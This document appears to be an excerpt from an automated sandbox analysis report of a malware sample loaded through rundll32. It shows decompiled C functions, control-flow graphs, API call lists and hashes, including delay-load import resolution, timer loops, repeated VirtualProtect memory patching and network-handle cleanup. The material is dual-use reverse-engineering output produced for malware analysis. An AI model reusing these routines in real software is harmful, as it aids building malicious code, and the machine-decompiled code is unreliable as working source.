                            control_flow_graph 243 4a17f35-4a17f9a 244 4a17fbb-4a17fe5 243->244 245 4a17f9c-4a17fb6 RaiseException 243->245 247 4a17fe7 244->247 248 4a17fea-4a17ff6 244->248 246 4a1816b-4a1816f 245->246 247->248 249 4a18009-4a1800b 248->249 250 4a17ff8-4a18003 248->250 251 4a18011-4a18018 249->251 252 4a180b3-4a180bd 249->252 250->249 258 4a1814e-4a18155 250->258 256 4a18028-4a18035 LoadLibraryA 251->256 257 4a1801a-4a18026 251->257 254 4a180c9-4a180cb 252->254 255 4a180bf-4a180c7 252->255 259 4a18149-4a1814c 254->259 260 4a180cd-4a180d0 254->260 255->254 261 4a18037-4a18047 GetLastError 256->261 262 4a18078-4a18084 InterlockedExchange 256->262 257->256 257->262 266 4a18157-4a18164 258->266 267 4a18169 258->267 259->258 269 4a180d2-4a180d5 260->269 270 4a180fe-4a1810c GetProcAddress 260->270 271 4a18057-4a18073 RaiseException 261->271 272 4a18049-4a18055 261->272 263 4a18086-4a1808a 262->263 264 4a180ac-4a180ad FreeLibrary 262->264 263->252 274 4a1808c-4a18098 LocalAlloc 263->274 264->252 266->267 267->246 269->270 275 4a180d7-4a180e2 269->275 270->259 273 4a1810e-4a1811e GetLastError 270->273 271->246 272->262 272->271 278 4a18120-4a18128 273->278 279 4a1812a-4a1812c 273->279 274->252 280 4a1809a-4a180aa 274->280 275->270 276 4a180e4-4a180ea 275->276 276->270 281 4a180ec-4a180ef 276->281 278->279 279->259 282 4a1812e-4a18146 RaiseException 279->282 280->252 281->270 283 4a180f1-4a180fc 281->283 282->259 283->259 283->270
                            C-Code - Quality: 51%
                            			E04A17F35(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x4a10000;
				_t115 = _t139[3] + 0x4a10000;
				_t131 = _t139[4] + 0x4a10000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x4a10000;
				_v16 = _t139[5] + 0x4a10000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x4a10002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x4a1a1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x4a1a1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x4a1a1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x4a1a1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x4a1a1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x4a1a1b8; // 0x0
										 *_t102 = _t125;
										 *0x4a1a1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x4a1a1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                            0x04a17f44
                            0x04a17f5a
                            0x04a17f60
                            0x04a17f62
                            0x04a17f67
                            0x04a17f6d
                            0x04a17f72
                            0x04a17f75
                            0x04a17f83
                            0x04a17f8a
                            0x04a17f8d
                            0x04a17f90
                            0x04a17f91
                            0x04a17f94
                            0x04a17f97
                            0x04a17f9a
                            0x04a17f9f
                            0x04a17fae
                            0x00000000
                            0x04a17fb4
                            0x04a17fbe
                            0x04a17fc8
                            0x04a17fcd
                            0x04a17fcf
                            0x04a17fd9
                            0x04a17fdc
                            0x04a17fdf
                            0x04a17fe5
                            0x04a17fe7
                            0x04a17fe7
                            0x04a17fea
                            0x04a17fed
                            0x04a17ff2
                            0x04a17ff6
                            0x04a18009
                            0x04a1800b
                            0x04a180b3
                            0x04a180b3
                            0x04a180ba
                            0x04a180bd
                            0x04a180c7
                            0x04a180c7
                            0x04a180cb
                            0x04a18149
                            0x04a1814c
                            0x04a1814e
                            0x04a1814e
                            0x04a18155
                            0x04a18157
                            0x04a18161
                            0x04a18164
                            0x04a18167
                            0x04a18167
                            0x00000000
                            0x04a180cd
                            0x04a180d0
                            0x04a180fe
                            0x04a18108
                            0x04a1810c
                            0x04a18114
                            0x04a18117
                            0x04a1811e
                            0x04a18128
                            0x04a18128
                            0x04a1812c
                            0x04a18131
                            0x04a18140
                            0x04a18146
                            0x04a18146
                            0x04a1812c
                            0x00000000
                            0x04a180d7
                            0x04a180da
                            0x04a180e2
                            0x04a180f7
                            0x04a180fc
                            0x00000000
                            0x00000000
                            0x04a180fc
                            0x00000000
                            0x04a180e2
                            0x04a180d0
                            0x04a180cb
                            0x04a18011
                            0x04a18018
                            0x04a18028
                            0x04a1802b
                            0x04a18031
                            0x04a18035
                            0x04a18078
                            0x04a18084
                            0x04a180ad
                            0x04a18086
                            0x04a1808a
                            0x04a18090
                            0x04a18098
                            0x04a1809a
                            0x04a1809d
                            0x04a180a3
                            0x04a180a5
                            0x04a180a5
                            0x04a18098
                            0x04a1808a
                            0x00000000
                            0x04a18084
                            0x04a1803d
                            0x04a18040
                            0x04a18047
                            0x04a18057
                            0x04a1805a
                            0x04a1806a
                            0x00000000
                            0x04a18070
                            0x04a18051
                            0x04a18055
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a18055
                            0x04a18022
                            0x04a18026
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a18026
                            0x04a17fff
                            0x04a18003
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04A17FAE
                            • LoadLibraryA.KERNEL32(?), ref: 04A1802B
                            • GetLastError.KERNEL32 ref: 04A18037
                            • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04A1806A
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: ExceptionRaise$ErrorLastLibraryLoad
                            • String ID: $
                            • API String ID: 948315288-3993045852
                            • Opcode ID: e73d8ed49ba2bc79d1b34362d19d2863fcfb19fa48d25e450d499bd5728adb49
                            • Instruction ID: 0b64c8202e02e7dd2bb0c6329b055f2228b08481df35e35ffb17ca220372a522
                            • Opcode Fuzzy Hash: e73d8ed49ba2bc79d1b34362d19d2863fcfb19fa48d25e450d499bd5728adb49
                            • Instruction Fuzzy Hash: 08814D75A012099FEB20DFA8D980AAEB7F5FF58710F14802DE945E7360E778E945CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A1661D Relevance: 16.7, APIs: 11, Instructions: 151timememoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 285 4a1661d-4a1664f memset CreateWaitableTimerA 286 4a167d0-4a167d6 GetLastError 285->286 287 4a16655-4a166ae _allmul SetWaitableTimer WaitForMultipleObjects 285->287 288 4a167da-4a167e4 286->288 289 4a166b4-4a166b7 287->289 290 4a16738-4a1673e 287->290 291 4a166c2 289->291 292 4a166b9 call 4a1216c 289->292 293 4a1673f-4a16743 290->293 294 4a166cc 291->294 299 4a166be-4a166c0 292->299 296 4a16753-4a16757 293->296 297 4a16745-4a1674d RtlFreeHeap 293->297 298 4a166d0-4a166d5 294->298 296->293 300 4a16759-4a16763 FindCloseChangeNotification 296->300 297->296 301 4a166d7-4a166de 298->301 302 4a166e8-4a16715 call 4a143eb 298->302 299->291 299->294 300->288 301->302 303 4a166e0 301->303 306 4a16765-4a1676a 302->306 307 4a16717-4a16722 302->307 303->302 308 4a16789-4a16791 306->308 309 4a1676c-4a16772 306->309 307->298 310 4a16724-4a1672f call 4a170d8 307->310 312 4a16797-4a167c5 _allmul SetWaitableTimer WaitForMultipleObjects 308->312 309->290 311 4a16774-4a16787 call 4a1561e 309->311 316 4a16734 310->316 311->312 312->298 315 4a167cb 312->315 315->290 316->290
                            C-Code - Quality: 83%
                            			E04A1661D(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				intOrPtr _t68;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x4a1a2e0);
					_v76 = 0;
					_v80 = 0;
					L04A1824A();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x4a1a30c; // 0x2c0
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x4a1a2ec = 5;
						} else {
							_t69 = E04A1216C(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x4a1a300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E04A143EB( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_t68 = E04A170D8(_t75,  &_v72, _a4, _a8); // executed
							_v124.HighPart = _t68;
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x4a1a2e4);
							goto L21;
						} else {
							__eflags =  *0x4a1a2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E04A1561E();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x4a1a2e8);
								L21:
								L04A1824A();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t65;
								__eflags = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							RtlFreeHeap( *0x4a1a2d8, 0, _t54); // executed
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					FindCloseChangeNotification(_v80); // executed
				}
				return _v92.HighPart;
				goto L25;
			}

































                            0x04a1661d
                            0x04a16633
                            0x04a16637
                            0x04a1663c
                            0x04a16643
                            0x04a16649
                            0x04a1664f
                            0x04a167d6
                            0x04a16655
                            0x04a16655
                            0x04a16657
                            0x04a1665c
                            0x04a1665d
                            0x04a16663
                            0x04a16667
                            0x04a1666b
                            0x04a16679
                            0x04a16687
                            0x04a1668b
                            0x04a1668d
                            0x04a1669a
                            0x04a166a6
                            0x04a166a8
                            0x04a166ae
                            0x04a166b7
                            0x04a166c2
                            0x04a166c2
                            0x04a166b9
                            0x04a166b9
                            0x04a166c0
                            0x00000000
                            0x00000000
                            0x04a166c0
                            0x04a166cc
                            0x00000000
                            0x04a166d0
                            0x04a166d5
                            0x04a166e0
                            0x04a166e0
                            0x04a166e8
                            0x04a166ee
                            0x04a166f6
                            0x04a166ff
                            0x04a16706
                            0x04a1670a
                            0x04a1670f
                            0x04a16715
                            0x00000000
                            0x00000000
                            0x04a16717
                            0x04a1671b
                            0x04a16722
                            0x00000000
                            0x04a16724
                            0x04a1672f
                            0x04a16734
                            0x04a16734
                            0x00000000
                            0x04a16765
                            0x04a16765
                            0x04a1676a
                            0x04a16789
                            0x04a1678b
                            0x04a16790
                            0x04a16791
                            0x00000000
                            0x04a1676c
                            0x04a1676c
                            0x04a16772
                            0x00000000
                            0x04a16774
                            0x04a16774
                            0x04a16779
                            0x04a1677b
                            0x04a16780
                            0x04a16781
                            0x04a16797
                            0x04a16797
                            0x04a1679f
                            0x04a167ad
                            0x04a167b1
                            0x04a167bd
                            0x04a167bf
                            0x04a167c3
                            0x04a167c5
                            0x00000000
                            0x04a167cb
                            0x00000000
                            0x04a167cb
                            0x04a167c5
                            0x04a16772
                            0x00000000
                            0x04a1676a
                            0x04a16738
                            0x04a1673a
                            0x04a1673e
                            0x04a1673f
                            0x04a1673f
                            0x04a16743
                            0x04a1674d
                            0x04a1674d
                            0x04a16753
                            0x04a16756
                            0x04a16756
                            0x04a1675d
                            0x04a1675d
                            0x04a167e4
                            0x00000000

                            APIs
                            • memset.NTDLL ref: 04A16637
                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04A16643
                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04A1666B
                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04A1668B
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,04A13EE8,?), ref: 04A166A6
                            • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,04A13EE8,?,00000000), ref: 04A1674D
                            • FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04A13EE8,?,00000000,?,?), ref: 04A1675D
                            • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04A16797
                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 04A167B1
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04A167BD
                              • Part of subcall function 04A1216C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05539400,00000000,?,7620F710,00000000,7620F730), ref: 04A121BB
                              • Part of subcall function 04A1216C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05539438,?,00000000,30314549,00000014,004F0053,055393F4), ref: 04A12258
                              • Part of subcall function 04A1216C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04A166BE), ref: 04A1226A
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04A13EE8,?,00000000,?,?), ref: 04A167D0
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$ChangeCloseCreateErrorFindLastNotificationmemset
                            • String ID:
                            • API String ID: 1236040543-0
                            • Opcode ID: 85b09a7de7bcea9479d90563d81dc7278c1a68be9249c407f719aa3ba7e4d467
                            • Instruction ID: 8cee47abab50ccf043446e2533613a4ad4b2d5649d7bb5fae934fd2ea6fe4558
                            • Opcode Fuzzy Hash: 85b09a7de7bcea9479d90563d81dc7278c1a68be9249c407f719aa3ba7e4d467
                            • Instruction Fuzzy Hash: 6A517BB1509320AFD711EF15DC44AABBBECEB89764F004A1EF8A4D2170D774A905CFA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F61A0A Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 318 4f61a0a-4f61a2b call 4f83d64 321 4f61a31-4f61a32 318->321 322 4f61b0d 318->322 323 4f61a34-4f61a37 321->323 324 4f61a98-4f61a9f 321->324 325 4f61b13-4f61b22 VirtualProtect 322->325 328 4f61b64-4f61b70 call 4f83d9f 323->328 329 4f61a3d 323->329 326 4f61ae0-4f61af5 VirtualProtect 324->326 327 4f61aa1-4f61aa8 324->327 330 4f61b24-4f61b3a VirtualProtect 325->330 331 4f61b3f-4f61b45 GetLastError 325->331 326->325 334 4f61af7-4f61b0b 326->334 327->326 333 4f61aaa-4f61ab6 327->333 335 4f61a43-4f61a4a 329->335 330->335 331->328 333->325 339 4f61ab8-4f61ac5 VirtualProtect 333->339 340 4f61adc-4f61ade VirtualProtect 334->340 336 4f61a8c-4f61a93 335->336 337 4f61a4c-4f61a50 335->337 336->328 337->336 341 4f61a52-4f61a6e lstrlen VirtualProtect 337->341 339->325 342 4f61ac7-4f61adb 339->342 340->325 341->336 343 4f61a70-4f61a8a lstrcpy VirtualProtect 341->343 342->340 343->336
                            APIs
                            • lstrlen.KERNEL32(?,?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000,?,00000000,04F80977,04F7893A,?,?), ref: 04F61A58
                            • VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000,?,00000000,04F80977), ref: 04F61A6A
                            • lstrcpy.KERNEL32(00000000,?), ref: 04F61A79
                            • VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000,?,00000000,04F80977), ref: 04F61A8A
                            • VirtualProtect.KERNEL32(00000001,00000005,00000040,-0000001C,04F86040,00000018,04F634DB,?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000), ref: 04F61AC1
                            • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000,?,00000000,04F80977), ref: 04F61ADC
                            • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,04F86040,00000018,04F634DB,?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000), ref: 04F61AF1
                            • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,04F86040,00000018,04F634DB,?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000), ref: 04F61B1E
                            • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000,?,00000000,04F80977), ref: 04F61B38
                            • GetLastError.KERNEL32(?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000,?,00000000,04F80977,04F7893A,?,?), ref: 04F61B3F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                            • String ID:
                            • API String ID: 3676034644-0
                            • Opcode ID: 0ba1f586ce2b8e1279086e2dd1955880971e11aae070a8a8311c2af6a2bd2a71
                            • Instruction ID: 7c6cff9227f442fa6063aa68e987d77cdff72be82649f93b5892731a3d7509b5
                            • Opcode Fuzzy Hash: 0ba1f586ce2b8e1279086e2dd1955880971e11aae070a8a8311c2af6a2bd2a71
                            • Instruction Fuzzy Hash: C8413F71A00709AFDB21DFA4CD44EAAB7F9FB04710F048619E652AA1A0E734F806DF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A14274 Relevance: 12.1, APIs: 8, Instructions: 75networkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 93%
                            			E04A14274(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E04A16E40(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					FindCloseChangeNotification(_t20); // executed
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E04A16C2C(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E04A16C2C(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E04A16C2C(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E04A16C2C(_t46);
				}
				return _t24;
			}












                            0x04a14274
                            0x04a14274
                            0x04a14276
                            0x04a14278
                            0x04a1427f
                            0x04a14286
                            0x04a14286
                            0x04a1428b
                            0x04a1428e
                            0x04a14295
                            0x04a1429e
                            0x04a142a2
                            0x04a142a7
                            0x04a142a7
                            0x04a142a9
                            0x04a142ae
                            0x04a142b2
                            0x04a142b7
                            0x04a142b7
                            0x04a142b9
                            0x04a142be
                            0x04a142c2
                            0x04a142c7
                            0x04a142c7
                            0x04a142c9
                            0x04a142d4
                            0x04a142d7
                            0x04a142d7
                            0x04a142d9
                            0x04a142de
                            0x04a142e1
                            0x04a142e1
                            0x04a142e3
                            0x04a142ea
                            0x04a142ed
                            0x04a142f2
                            0x04a142f5
                            0x04a142f5
                            0x04a142f8
                            0x04a142fd
                            0x04a14300
                            0x04a14300
                            0x04a14305
                            0x04a14309
                            0x04a1430c
                            0x04a1430c
                            0x04a14311
                            0x04a14316
                            0x00000000
                            0x04a14319
                            0x04a14320

                            APIs
                            • InternetSetStatusCallback.WININET(?,00000000), ref: 04A142A2
                            • InternetCloseHandle.WININET(?), ref: 04A142A7
                            • InternetSetStatusCallback.WININET(?,00000000), ref: 04A142B2
                            • InternetCloseHandle.WININET(?), ref: 04A142B7
                            • InternetSetStatusCallback.WININET(?,00000000), ref: 04A142C2
                            • InternetCloseHandle.WININET(?), ref: 04A142C7
                            • FindCloseChangeNotification.KERNEL32(?,00000000,00000102,?,?,04A13801,?,?,761F81D0,00000000,00000000), ref: 04A142D7
                            • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04A13801,?,?,761F81D0,00000000,00000000), ref: 04A142E1
                              • Part of subcall function 04A16E40: WaitForMultipleObjects.KERNEL32(00000002,04A17BB5,00000000,04A17BB5,?,?,?,04A17BB5,0000EA60), ref: 04A16E5B
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Internet$Close$Handle$CallbackStatus$ChangeFindMultipleNotificationObjectsWait
                            • String ID:
                            • API String ID: 2172891992-0
                            • Opcode ID: 455a14dd8299d31ba1f165ee3405cb596cbb2ec6b729a1b03f30ffdd246c4d75
                            • Instruction ID: be413e3a0abc4c4c8d28663afc45f5dbdedbbebefb31ca9560f69370ad31c41f
                            • Opcode Fuzzy Hash: 455a14dd8299d31ba1f165ee3405cb596cbb2ec6b729a1b03f30ffdd246c4d75
                            • Instruction Fuzzy Hash: 2D11E97A6006485BC630AFBEED84C5BB7EEEF483143550D1DE446D7960C735F8858A64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F73959 Relevance: 10.7, APIs: 7, Instructions: 185registrysynchronizationprocessCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
